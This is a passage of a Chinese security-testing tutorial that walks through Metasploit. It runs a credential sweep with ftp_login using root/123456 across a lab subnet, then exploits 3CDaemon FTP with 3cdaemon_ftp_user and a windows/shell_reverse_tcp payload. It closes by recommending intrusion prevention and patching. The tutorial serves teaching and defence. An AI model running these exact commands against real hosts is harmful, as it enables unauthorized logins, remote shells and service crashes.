安全测试工具Metasploit与漏洞扫描

发表于:2017-2-28 10:49

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:kaitoulee    来源:51Testing软件测试网采编

  4、Metasploit的专用FTP扫描器
  除了集成的扫描工具,Metasploit自带的辅助模块,可以针对网络中特定的漏洞进行扫描。下面以FTP扫描为例,介绍Metasploit自带扫描器的使用方法。
选择ftp_login模块,扫描网段192.168.20.1-10中能使用固定用户名和密码root/123456登陆主机:
msf > use auxiliary/scanner/ftp/ftp_login
msf  auxiliary(ftp_login) > set USERNAME root
USERNAME => root
msf  auxiliary(ftp_login) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(ftp_login) > set RHOSTS 192.168.20.1-10
RHOSTS => 192.168.20.1-10
msf  auxiliary(ftp_login) > run
[*] 192.168.20.1:21 - Starting FTP login sweep
[*] Connecting to FTP server 192.168.20.1:21...
……
[*] 192.168.20.1:21 FTP - [1/1] - Attempting FTP login for 'root':'123456'
[+] 192.168.20.1:21 - Successful FTP login for 'root':'123456'
[*] 192.168.20.1:21 - User 'root' has READ/WRITE access
……
[*] Connecting to FTP server 192.168.20.4:21...
[*] Connected to target FTP server.
[+] 192.168.20.4:21 - Successful FTP login for 'root':'123456'
[*] 192.168.20.4:21 - User 'root' has READ/WRITE access
……
[*] Connecting to FTP server 192.168.20.6:21...
[*] Connected to target FTP server.
[+] 192.168.20.6:21 - Successful FTP login for 'root':'123456'
[*] 192.168.20.6:21 - User 'root' has READ/WRITE access
……
[*] Connecting to FTP server 192.168.20.9:21...
[*] Connected to target FTP server.
[+] 192.168.20.9:21 - Successful FTP login for 'root':'123456'
[*] 192.168.20.9:21 - User 'root' has READ/WRITE access
[*] Scanned 10 of 10 hosts (100% complete)
[*] Auxiliary module execution completed
  查看输出结果,10个IP中有4台FTP Server均能使用root/123456账号登陆,并且含有读写权限。通常在公司内网里,很多人习惯使用简单的账号,没有足够的安全意识,当攻击者成功入侵内网后,这些工作站将非常危险。
  四、Metasploit的一个攻击实例
  漏洞扫描仅仅是Metasploit Framework强大功能的冰山一角,下面简单说明一下Metasploit执行一次攻击测试的方法。利用上面Nmap的扫描结果,选取192.168.20.4上所运行的3Com 3CDaemon FTP Server为攻击目标。通过前面的扫描可以得到目标主机运行的操作系统及应用程序版本的详细信息,如图4所示,在Metasploit Framework里搜索针对3CDaemon的攻击脚本:
  
图4  搜索针对3CDaemon的攻击脚本
  use命令进入搜索到的exploit:
  msf > use exploit/windows/ftp/3cdaemon_ftp_user
  msf  exploit(3cdaemon_ftp_user) >
  Set RHOST命令设置攻击目标机的IP地址:
  msf  exploit(3cdaemon_ftp_user) > set RHOST 192.168.20.4
  RHOST => 192.168.20.4
  Set target命令设置目标机的操作系统类型:
  msf  exploit(3cdaemon_ftp_user) > set target 4
  target => 4
  设置完成之后, show options显示设置好的参数信息:
msf  exploit(3cdaemon_ftp_user) > show options
Module options (exploit/windows/ftp/3cdaemon_ftp_user):
Name     Current Setting      Required  Description
----     ---------------      --------  -----------
FTPPASS  mozilla@example.com  no        The password for the specified username
FTPUSER  anonymous              no        The username to authenticate as
RHOST    192.168.20.4          yes        The target address
RPORT    21                      yes        The target port
Payload options (windows/shell_reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh                yes       Exit technique: seh, thread, process, none
LHOST     192.168.20.67     yes       The listen address
LPORT     4444                yes       The listen port
Exploit target:
Id  Name
--  ----
4   Windows XP English SP3
  输入exploit命令,开始攻击:
  msf  exploit(3cdaemon_ftp_user) > exploit
  [*] Started reverse handler on 192.168.20.67:4444
  [*] Trying target Windows XP English SP3...
  msf  exploit(3cdaemon_ftp_user) >
  如图5所示查看目标机3CDaemon FTP软件显示崩溃,攻击成功!
  
图5  3CDaemon FTP崩溃
  分析抓包结果,可以看出该FTP攻击脚本是利用超长用户名(如图6所示)导致FTP Server崩溃的。
  
图6   抓包结果
  五、结束语
  避免黑客攻击,部署专门的漏洞检测防御系统是非常必要的。Metasploit提供了丰富的扫描功能、攻击脚本及二次开发的平台,使网络安全漏洞检测变得相对容易。H3C的IPS(Intrusion Prevention System)采用系统的防御方法,结合智能的规则识别技术可以对各种漏洞攻击进行有效的防御。为应对技术的更新,H3C攻防团队会主动关注网络上新的攻击方式,并将分析结果及时添加到IPS特征库中供客户升级使用。对于系统维护者来说,积极主动的查找漏洞并打上相应补丁,同时结合专业的防御设备进行入侵防御,毫无疑问是维护系统安全的最佳方法。
22/2<12
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号